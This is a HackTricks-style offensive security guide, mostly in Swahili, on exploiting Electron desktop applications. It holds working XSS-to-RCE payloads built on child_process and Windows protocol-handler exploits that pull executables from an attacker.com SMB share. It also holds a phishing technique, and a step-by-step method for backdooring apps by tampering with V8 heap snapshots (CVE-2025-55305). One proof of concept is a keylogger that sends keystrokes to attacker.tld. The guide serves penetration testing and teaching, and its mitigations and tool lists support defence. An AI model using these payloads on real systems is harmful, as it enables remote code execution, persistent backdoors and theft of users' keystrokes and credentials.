Programu za Desktop za Electron

Reading time: 20 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Utangulizi

Electron huunganisha backend ya ndani (ikiwa na NodeJS) na frontend (Chromium), ingawa ina upungufu wa baadhi ya mifumo ya usalama ya vivinjari vya kisasa.

Mara nyingi unaweza kupata msimbo wa app ya electron ndani ya programu ya .asar; ili kupata msimbo unahitaji kuutoa:

bash
npx asar extract app.asar destfolder #Extract everything
npx asar extract-file app.asar main.js #Extract just a file

Katika msimbo wa chanzo wa app ya Electron, ndani ya packet.json, unaweza kupata faili main.js iliyobainishwa ambapo mipangilio ya usalama imewekwa.

json
{
"name": "standard-notes",
"main": "./app/index.js",

Electron ina aina mbili za mchakato:

  • Main Process (ina ufikiaji kamili wa NodeJS)
  • Renderer Process (inapaswa kuwa na ufikiaji mdogo wa NodeJS kwa sababu za usalama)

Mchakato wa renderer process utakuwa dirisha la kivinjari linalopakia faili:

javascript
const { BrowserWindow } = require("electron")
let win = new BrowserWindow()

//Open Renderer Process
win.loadURL(`file://path/to/index.html`)

Mipangilio ya renderer process yanaweza kusanidiwa katika main process ndani ya faili main.js. Baadhi ya mipangilio yatazuia programu ya Electron kupata RCE au udhaifu mwingine ikiwa mipangilio imewekwa ipasavyo.

Programu ya Electron inaweza kufikia kifaa kupitia Node apis ingawa inaweza kusanidiwa kuizuia:

  • nodeIntegration - kwa chaguo-msingi ni off. Ikiwa on, inaruhusu kufikia vipengele vya Node kutoka kwenye renderer process.
  • contextIsolation - kwa chaguo-msingi ni on. Ikiwa off, main na renderer processes hazitenganishwi.
  • preload - tupu kwa chaguo-msingi.
  • sandbox - kwa chaguo-msingi ni off. Itazuia vitendo ambavyo NodeJS inaweza kufanya.
  • Node Integration in Workers
  • nodeIntegrationInSubframes - kwa chaguo-msingi ni off.
  • Ikiwa nodeIntegration imewezeshwa, hii itaruhusu matumizi ya Node.js APIs katika kurasa za wavuti zinazopakiwa ndani ya iframes ndani ya programu ya Electron.
  • Ikiwa nodeIntegration imezimwa, basi preloads zitaanzishwa ndani ya iframe

Mfano wa usanidi:

javascript
const mainWindowOptions = {
title: "Discord",
backgroundColor: getBackgroundColor(),
width: DEFAULT_WIDTH,
height: DEFAULT_HEIGHT,
minWidth: MIN_WIDTH,
minHeight: MIN_HEIGHT,
transparent: false,
frame: false,
resizable: true,
show: isVisible,
webPreferences: {
blinkFeatures: "EnumerateDevices,AudioOutputDevices",
nodeIntegration: false,
contextIsolation: false,
sandbox: false,
nodeIntegrationInSubFrames: false,
preload: _path2.default.join(__dirname, "mainScreenPreload.js"),
nativeWindowOpen: true,
enableRemoteModule: false,
spellcheck: true,
},
}

Baadhi ya RCE payloads kutoka here:

html
Example Payloads (Windows):
<img
src="x"
onerror="alert(require('child_process').execSync('calc').toString());" />

Example Payloads (Linux & MacOS):
<img
src="x"
onerror="alert(require('child_process').execSync('gnome-calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('id').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('ls -l').toString());" />
<img
src="x"
onerror="alert(require('child_process').execSync('uname -a').toString());" />

Kukamata trafiki

Badilisha usanidi wa start-main na ongeza matumizi ya proxy kama:

javascript
"start-main": "electron ./dist/main/main.js --proxy-server=127.0.0.1:8080 --ignore-certificateerrors",

Electron Local Code Injection

Ikiwa unaweza kuendesha Electron App ndani ya mashine yako, inawezekana kwamba unaweza kuifanya itekeleze arbitrary javascript code. Angalia jinsi katika:

macOS Electron Applications Injection

RCE: XSS + nodeIntegration

Ikiwa nodeIntegration imewekwa kuwa on, JavaScript ya ukurasa wa wavuti inaweza kutumia vipengele vya Node.js kwa urahisi kwa kupiga tu require(). Kwa mfano, njia ya kuendesha application ya calc kwenye Windows ni:

html
<script>
require("child_process").exec("calc")
// or
top.require("child_process").exec("open /System/Applications/Calculator.app")
</script>

RCE: preload

Script iliyotajwa katika mpangilio huu ni imepakuliwa kabla ya scripts nyingine katika renderer, hivyo ina ufikiaji usio na kikomo kwa Node APIs:

javascript
new BrowserWindow{
webPreferences: {
nodeIntegration: false,
preload: _path2.default.join(__dirname, 'perload.js'),
}
});

Kwa hivyo, script inaweza ku-export node-features kwa pages:

preload.js
typeof require === "function"
window.runCalc = function () {
require("child_process").exec("calc")
}
index.html
<body>
<script>
typeof require === "undefined"
runCalc()
</script>
</body>

[!NOTE] > Ikiwa contextIsolation imewezeshwa, hii haitafanya kazi

RCE: XSS + contextIsolation

contextIsolation huanzisha muktadha tofauti kati ya scripts za ukurasa wa wavuti na code ya ndani ya Electron ili utekelezaji wa JavaScript wa kila code usiathiriane. Hii ni sifa muhimu kuondoa uwezekano wa RCE.

Kama muktadha haukutengwa, mshambuliaji anaweza:

  1. Endesha JavaScript yoyote katika renderer (XSS au kuvinjari kwenda tovuti za nje)
  2. Kuandika upya built-in method ambayo inatumiwa katika preload au Electron internal code ili kudhibiti function
  3. Kusababisha matumizi ya function iliyooandikwa upya
  4. RCE?

Kuna sehemu 2 ambapo built-int methods zinaweza kuandikwa upya: Katika preload code au katika Electron internal code:

Electron contextIsolation RCE via preload code

Electron contextIsolation RCE via Electron internal code

Electron contextIsolation RCE via IPC

Bypass click event

Kama kuna vizuizi vinavyotumika unapobofya link unaweza kuvipita kwa kubofya kwa kitufe cha katikati (middle click) badala ya bofya la kushoto la kawaida

javascript
window.addEventListener('click', (e) => {

RCE via shell.openExternal

Kwa taarifa zaidi kuhusu mifano hii angalia https://shabarkin.medium.com/1-click-rce-in-electron-applications-79b52e1fe8b8 na https://benjamin-altpeter.de/shell-openexternal-dangers/

Wakati wa kupeleka programu ya desktop ya Electron, kuhakikisha mipangilio sahihi ya nodeIntegration na contextIsolation ni muhimu. Imebainishwa kwamba client-side remote code execution (RCE) inayolenga preload scripts au native code ya Electron kutoka main process inadhibitiwa kwa ufanisi ikiwa mipangilio hii imewekwa.

Wakati mtumiaji anapotumia viungo au kufungua madirisha mapya, wasikilizaji maalum wa matukio huanzishwa, ambayo ni muhimu kwa usalama na utendakazi wa programu:

javascript
webContents.on("new-window", function (event, url, disposition, options) {}
webContents.on("will-navigate", function (event, url) {}

Wasikilizaji hawa wanabadilishwa na programu ya desktop ili kutekeleza mantiki ya biashara yake. Programu huchunguza kama kiungo kilichofunguliwa kinapaswa kufunguliwa ndani ya programu au katika kivinjari cha wavuti cha nje. Uamuzi huu kawaida hufanywa kupitia function, openInternally. Ikiwa function hii inarudisha false, inaonyesha kwamba kiungo kinapaswa kufunguliwa nje, kwa kutumia function shell.openExternal.

Hapa kuna pseudocode iliyorahishwa:

https://miro.medium.com/max/1400/1*iqX26DMEr9RF7nMC1ANMAA.png

https://miro.medium.com/max/1400/1*ZfgVwT3X1V_UfjcKaAccag.png

Electron JS security best practices yanapendekeza kutoikubali content isiyo ya kuaminika kwa kutumia openExternal, kwani inaweza kusababisha RCE kupitia protocols mbalimbali. Systems za uendeshaji zinaunga mkono protocols tofauti ambazo zinaweza kusababisha RCE. Kwa mifano ya kina na maelezo zaidi juu ya mada hii, unaweza kurejea rasilimali hii, ambayo inajumuisha Windows protocol examples zinazoweza kutumiwa ku-exploit ugumu huu.

Katika macos, function ya openExternal inaweza kutumika vibaya kutekeleza amri yoyote kama katika shell.openExternal('file:///System/Applications/Calculator.app').

Mifano ya Windows protocol exploits ni pamoja na:

html
<script>
window.open(
"ms-msdt:id%20PCWDiagnostic%20%2Fmoreoptions%20false%20%2Fskip%20true%20%2Fparam%20IT_BrowseForFile%3D%22%5Cattacker.comsmb_sharemalicious_executable.exe%22%20%2Fparam%20IT_SelectProgram%3D%22NotListed%22%20%2Fparam%20IT_AutoTroubleshoot%3D%22ts_AUTO%22"
)
</script>

<script>
window.open(
"search-ms:query=malicious_executable.exe&crumb=location:%5C%5Cattacker.com%5Csmb_share%5Ctools&displayname=Important%20update"
)
</script>

<script>
window.open(
"ms-officecmd:%7B%22id%22:3,%22LocalProviders.LaunchOfficeAppForResult%22:%7B%22details%22:%7B%22appId%22:5,%22name%22:%22Teams%22,%22discovered%22:%7B%22command%22:%22teams.exe%22,%22uri%22:%22msteams%22%7D%7D,%22filename%22:%22a:/b/%2520--disable-gpu-sandbox%2520--gpu-launcher=%22C:%5CWindows%5CSystem32%5Ccmd%2520/c%2520ping%252016843009%2520&&%2520%22%22%7D%7D"
)
</script>

RCE: webviewTag + preload IPC dhaifu + shell.openExternal

Udhaifu huu unaweza kupatikana katika this report.

The webviewTag ni sifa iliyokataliwa inayoruhusu matumizi ya NodeJS katika renderer process, ambayo inapaswa kuzimwa kwa kuwa inaruhusu kupakia script ndani ya preload context kama:

xml
<webview src="https://example.com/" preload="file://malicious.example/test.js"></webview>

Kwa hivyo, mshambuliaji anayefanikiwa kupakia ukurasa wowote anaweza kutumia tag hiyo ili kupakia preload script yoyote.

Preload script hii ilitumiwa vibaya kisha kuitisha vulnerable IPC service (skype-new-window) ambayo ilikuwa ikiita shell.openExternal ili kupata RCE:

javascript
(async() => {
const { ipcRenderer } = require("electron");
await ipcRenderer.invoke("skype-new-window", "https://example.com/EXECUTABLE_PATH");
setTimeout(async () => {
const username = process.execPath.match(/C:\\Users\\([^\\]+)/);
await ipcRenderer.invoke("skype-new-window", `file:///C:/Users/${username[1]}/Downloads/EXECUTABLE_NAME`);
}, 5000);
})();

Kusoma Faili za Ndani: XSS + contextIsolation

Kuzima contextIsolation kunaruhusu matumizi ya <webview> tags, sawa na <iframe>, kwa kusoma na exfiltrating faili za ndani. Mfano ulioonyeshwa unaonyesha jinsi ya kutumia udhaifu huu kusoma yaliyomo ya faili za ndani:

Zaidi ya hayo, njia nyingine ya kusoma faili ya ndani imewasilishwa, ikionyesha udhaifu muhimu wa kusoma faili za ndani katika Electron desktop app. Hii inahusisha kuingiza script ili kuitumia application na exfiltrate data:

html
<br /><br /><br /><br />
<h1>
pwn<br />
<iframe onload="j()" src="/etc/hosts">xssxsxxsxs</iframe>
<script type="text/javascript">
function j() {
alert(
"pwned contents of /etc/hosts :\n\n " +
frames[0].document.body.innerText
)
}
</script>
</h1>

RCE: XSS + Old Chromium

Ikiwa chromium inayotumiwa na programu ni zamani na kuna vulnerabilities zilizojulikana ndani yake, inaweza kuwa inawezekana kuitumia na kupata RCE kupitia XSS.\
Unaweza kuona mfano katika writeup hii: https://blog.electrovolt.io/posts/discord-rce/

XSS Phishing via Internal URL regex bypass

Iwapo umetambua XSS lakini huwezi kusababisha RCE au kuiba faili za ndani, unaweza kujaribu kuitumia kuiba credentials kupitia phishing.

Kwanza kabisa unahitaji kujua kinachotokea unapojaribu kufungua URL mpya, ukiangalia code ya JS katika front-end:

javascript
webContents.on("new-window", function (event, url, disposition, options) {} // opens the custom openInternally function (it is declared below)
webContents.on("will-navigate", function (event, url) {}                    // opens the custom openInternally function (it is declared below)

Wito wa openInternally utaamua ikiwa link itafunguliwa katika desktop window kama ni link inayomilikiwa na platform, au itafunguliwa katika browser kama 3rd party resource.

Katika kesi ambapo regex inayotumiwa na function ni nyeti kwa bypasses (kwa mfano kwa kutokutoa escape kwa dots za subdomains) mshambuliaji anaweza kutumia XSS kufungua dirisha jipya ambalo litakuwa kwenye miundombinu ya mshambuliaji litaomba vigezo vya kuingia kwa mtumiaji:

html
<script>
window.open("<http://subdomainagoogleq.com/index.html>")
</script>

file:// Protokoli

Kama ilivyotajwa katika the docs kurasa zinazoendeshwa kwa file:// zina ufikiaji wa upande mmoja kwa kila faili kwenye mashine yako, ikimaanisha kwamba masuala ya XSS yanaweza kutumika kupakia faili za aina yoyote kutoka kwenye mashine ya mtumiaji. Kutumia protokoli maalum kunazuia matatizo kama haya kwa sababu unaweza kupunguza protokoli ili kutoa tu seti maalum ya faili.

Moduli ya Remote

Moduli ya Remote ya Electron inaruhusu mchakato za renderer kufikia API za mchakato mkuu, ikirahisisha mawasiliano ndani ya programu ya Electron. Hata hivyo, kuamilisha moduli hii kunaweka hatari kubwa za usalama. Inapanua uso wa shambulio la programu, na kuifanya iwe nyeti zaidi kwa udhaifu kama cross-site scripting (XSS) attacks.

tip

Ingawa moduli ya remote inaonyesha baadhi ya API kutoka mchakato mkuu hadi mchakato za renderer, sio rahisi kupata RCE kwa kumeza tu komponenti hizi. Hata hivyo, komponenti zinaweza kufichua taarifa nyeti.

warning

Programu nyingi ambazo bado zinatumia moduli ya remote hufanya hivyo kwa njia inayohitaji NodeIntegration iwe imewezeshwa katika mchakato wa renderer, jambo ambalo ni hatari kubwa ya usalama.

Tangu Electron 14, moduli ya remote ya Electron inaweza kuwa imewezishwa kwa hatua kadhaa; kutokana na sababu za usalama na utendaji, inashauriwa kutoitumia.

Ili kuiwezesha, kwanza inahitajika kuiwezesha katika mchakato mkuu:

javascript
const remoteMain = require('@electron/remote/main')
remoteMain.initialize()
[...]
function createMainWindow() {
mainWindow = new BrowserWindow({
[...]
})
remoteMain.enable(mainWindow.webContents)

Kisha, mchakato wa renderer unaweza kuingiza vitu kutoka kwenye module kama ifuatavyo:

javascript
import { dialog, getCurrentWindow } from '@electron/remote'

Mchapisho wa blog post unaonyesha baadhi ya functions za kuvutia zinazotolewa na object app kutoka kwa remote module:

  • app.relaunch([options])
  • Inazindua upya programu kwa kuexit instance ya sasa na kuanzisha mpya. Inafaa kwa app updates au mabadiliko makubwa ya state.
  • app.setAppLogsPath([path])
  • Huweka au huunda saraka kwa ajili ya kuhifadhi app logs. Logs zinaweza kutolewa au kubadilishwa kwa kutumia app.getPath() au app.setPath(pathName, newPath).
  • app.setAsDefaultProtocolClient(protocol[, path, args])
  • Inasajili executable ya sasa kama default handler kwa protocol maalum. Unaweza kutoa custom path na arguments ikiwa zinahitajika.
  • app.setUserTasks(tasks)
  • Inaongeza tasks kwenye Tasks category katika Jump List (Windows). Kila task inaweza kudhibiti jinsi app inavyofunguliwa (launched) au ni arguments gani zinapitishwa.
  • app.importCertificate(options, callback)
  • Inaingiza PKCS#12 certificate kwenye certificate store ya mfumo (Linux tu). Callback inaweza kutumika kushughulikia matokeo.
  • app.moveToApplicationsFolder([options])
  • Inahamisha programu kwenye Applications folder (macOS). Husaidia kuhakikisha standard installation kwa watumiaji wa Mac.
  • app.setJumpList(categories)
  • Inatengeneza au inaondoa custom Jump List kwenye Windows. Unaweza kuainisha categories kupanga jinsi tasks zinavyoonekana kwa mtumiaji.
  • app.setLoginItemSettings(settings)
  • Inabainisha executable zipi zinaanza wakati wa login pamoja na options zao (macOS na Windows tu).

Example:

javascript
Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

systemPreferences module

API kuu kwa kufikia mipangilio ya mfumo na kutoa matukio ya mfumo katika Electron. Mbinu kama subscribeNotification, subscribeWorkspaceNotification, getUserDefault, na setUserDefault zote ni sehemu ya moduli hii.

Mfano wa matumizi:

javascript
const { systemPreferences } = require('electron');

// Subscribe to a specific notification
systemPreferences.subscribeNotification('MyCustomNotification', (event, userInfo) => {
console.log('Received custom notification:', userInfo);
});

// Get a user default key from macOS
const recentPlaces = systemPreferences.getUserDefault('NSNavRecentPlaces', 'array');
console.log('Recent Places:', recentPlaces);

subscribeNotification / subscribeWorkspaceNotification

  • Husikiliza arifa za asili za macOS kwa kutumia NSDistributedNotificationCenter.
  • Kabla ya macOS Catalina, ulikuwa unaweza sniff arifa zote zilizosambazwa kwa kutuma nil kwa CFNotificationCenterAddObserver.
  • Baada ya Catalina / Big Sur, sandboxed apps bado zinaweza subscribe kwa matukio mengi (kwa mfano, screen locks/unlocks, volume mounts, network activity, n.k.) kwa kujiandikisha arifa kwa jina.

getUserDefault / setUserDefault

  • Inashirikiana na NSUserDefaults, ambayo huhifadhi mapendeleo ya application au global kwenye macOS.

  • getUserDefault inaweza kutoa taarifa nyeti, kama eneo la faili za hivi karibuni au eneo la kijiografia la mtumiaji.

  • setUserDefault inaweza kubadilisha mapendeleo haya, na hivyo kuathiri configuration ya app.

  • Katika matoleo ya zamani ya Electron (kabla ya v8.3.0), tu standard suite ya NSUserDefaults ilikuwa inapatikana.

Shell.showItemInFolder

Kazi hii inaonyesha faili iliyotolewa katika file manager, ambayo inaweza kutekeleza faili hiyo moja kwa moja.

For more information check https://blog.doyensec.com/2021/02/16/electron-apis-misuse.html

Content Security Policy

Programu za Electron zinapaswa kuwa na Content Security Policy (CSP) ili kuzuia XSS attacks. CSP ni standard ya usalama inayosaidia kuzuia utekelezaji wa untrusted code katika browser.

Kwa kawaida hupangwa katika faili ya main.js au katika kiolezo cha index.html na CSP ndani ya meta tag.

For more information check:

Content Security Policy (CSP) Bypass

Tools

  • Electronegativity ni zana ya kubaini misconfigurations na security anti-patterns katika applications zinazotegemea Electron.
  • Electrolint ni plugin ya VS Code open source kwa applications za Electron inayotumia Electronegativity.
  • nodejsscan kwa kuangalia third-party libraries zilizo vulnerable
  • Electro.ng: Unahitaji kununua

Maabara

In https://www.youtube.com/watch?v=xILfQGkLXQo&t=22s unaweza kupata maabara ili exploit vulnerable Electron apps.

Baadhi ya amri zitakazokusaidia katika maabara:

bash
# Download apps from these URls
# Vuln to nodeIntegration
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable1.zip
# Vuln to contextIsolation via preload script
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable2.zip
# Vuln to IPC Rce
https://training.7asecurity.com/ma/webinar/desktop-xss-rce/apps/vulnerable3.zip

# Get inside the electron app and check for vulnerabilities
npm audit

# How to use electronegativity
npm install @doyensec/electronegativity -g
electronegativity -i vulnerable1

# Run an application from source code
npm install -g electron
cd vulnerable1
npm install
npm start

Local backdooring via V8 heap snapshot tampering (Electron/Chromium) – CVE-2025-55305

Apps za Electron na zinazotegemea Chromium deserialize a prebuilt V8 heap snapshot at startup (v8_context_snapshot.bin, and optionally browser_v8_context_snapshot.bin) to initialize each V8 isolate (main, preload, renderer). Kihistoria, Electron’s integrity fuses did not treat these snapshots as executable content, so they escaped both fuse-based integrity enforcement and OS code-signing checks. Kwa matokeo, kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kulitoa utekelezaji wa code wa kisiri, wa kudumu ndani ya app bila kuharibu the signed binaries au ASAR.

Key points

  • Integrity gap: EnableEmbeddedAsarIntegrityValidation and OnlyLoadAppFromAsar validate app JavaScript inside the ASAR, but they did not cover V8 heap snapshots (CVE-2025-55305). Chromium similarly does not integrity-check snapshots.
  • Attack preconditions: Local file write into the app’s installation directory. Hii ni kawaida kwenye systems ambapo Electron apps au Chromium browsers zimewekwa under user-writable paths (e.g., %AppData%\Local on Windows; /Applications with caveats on macOS).
  • Effect: Reliable execution of attacker JavaScript in any isolate by clobbering a frequently used builtin (a ā€œgadgetā€), enabling persistence and evasion of code-signing verification.
  • Affected surface: Electron apps (even with fuses enabled) and Chromium-based browsers that load snapshots from user-writable locations.

Generating a malicious snapshot without building Chromium

  • Use the prebuilt electron/mksnapshot to compile a payload JS into a snapshot and overwrite the application’s v8_context_snapshot.bin.

Example wa payload ndogo (thibitisha uteklezaji kwa kulazimisha crash)

js
// Build snapshot from this payload
// npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
// Replace the application’s v8_context_snapshot.bin with the generated file

const orig = Array.isArray;

// Use Array.isArray as a ubiquitous gadget
Array.isArray = function () {
// Executed whenever the app calls Array.isArray
throw new Error("testing isArray gadget");
};

Isolate-aware payload routing (run different code in main vs. renderer)

  • Utambuzi wa main process: Node-only globals kama process.pid, process.binding(), au process.dlopen zipo katika main process isolate.
  • Utambuzi wa browser/renderer: Browser-only globals kama alert zinapatikana wakati zikiendeshwa katika muktadha wa dokumenti.

Mfano wa gadget inayochunguza uwezo wa Node wa main-process mara moja

js
const orig = Array.isArray;

Array.isArray = function() {
// Defer until we land in main (has Node process)
try {
if (!process || !process.pid) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}

// Run once
if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
console.log('[payload] isArray hook started ...');

// Capability probing in main
console.log(`[payload] unconstrained fetch available: [${fetch ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained fs available: [${process.binding('fs') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained spawn available: [${process.binding('spawn_sync') ? 'y' : 'n'}]`);
console.log(`[payload] unconstrained dlopen available: [${process.dlopen ? 'y' : 'n'}]`);
process.exit(0);
}
return orig(...arguments);
};

Renderer/browser-context data theft PoC (kwa mfano Slack)

js
const orig = Array.isArray;
Array.isArray = function() {
// Wait for a browser context
try {
if (!alert) {
return orig(...arguments);
}
} catch (_) {
return orig(...arguments);
}

if (!globalThis._invoke_lock) {
globalThis._invoke_lock = true;
setInterval(() => {
window.onkeydown = (e) => {
fetch('http://attacker.tld/keylogger?q=' + encodeURIComponent(e.key), {mode: 'no-cors'})
}
}, 1000);
}
return orig(...arguments);
};

Mtiririko wa operator

  1. Andika payload.js inayobadilisha builtin ya kawaida (mfano, Array.isArray) na hiari itumie matawi kwa kila isolate.
  2. Jenga snapshot bila vyanzo vya Chromium:
  • npx -y electron-mksnapshot@37.2.6 "/abs/path/to/payload.js"
  1. Funika faili za snapshot za programu lengwa:
  • v8_context_snapshot.bin (always used)
  • browser_v8_context_snapshot.bin (if the LoadBrowserProcessSpecificV8Snapshot fuse is used)
  1. Anzisha programu; gadget itatekelezwa kila wakati builtin iliyochaguliwa inapoitwa.

Vidokezo na mambo ya kuzingatia

  • Integrity/signature bypass: Snapshot files are not treated as native executables by code-signing checks and (historically) were not covered by Electron’s fuses or Chromium integrity controls.
  • Uendelevu: Kubadilisha snapshot katika usakinishaji unaoweza kuandikwa na mtumiaji kwa kawaida hufanikiwa kuhimili anzisho upya za app na inaonekana kama app iliyotiwa saini na halali.
  • Chromium browsers: The same tampering concept applies to Chrome/derivatives installed in user-writable locations. Chrome has other integrity mitigations but explicitly excludes physically local attacks from its threat model.

Ugundaji na hatua za kupunguza

  • Treat snapshots as executable content and include them in integrity enforcement (CVE-2025-55305 fix).
  • Prefer admin-writable-only install locations; baseline and monitor hashes for v8_context_snapshot.bin and browser_v8_context_snapshot.bin.
  • Detect early-runtime builtin clobbering and unexpected snapshot changes; alert when deserialized snapshots do not match expected values.

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks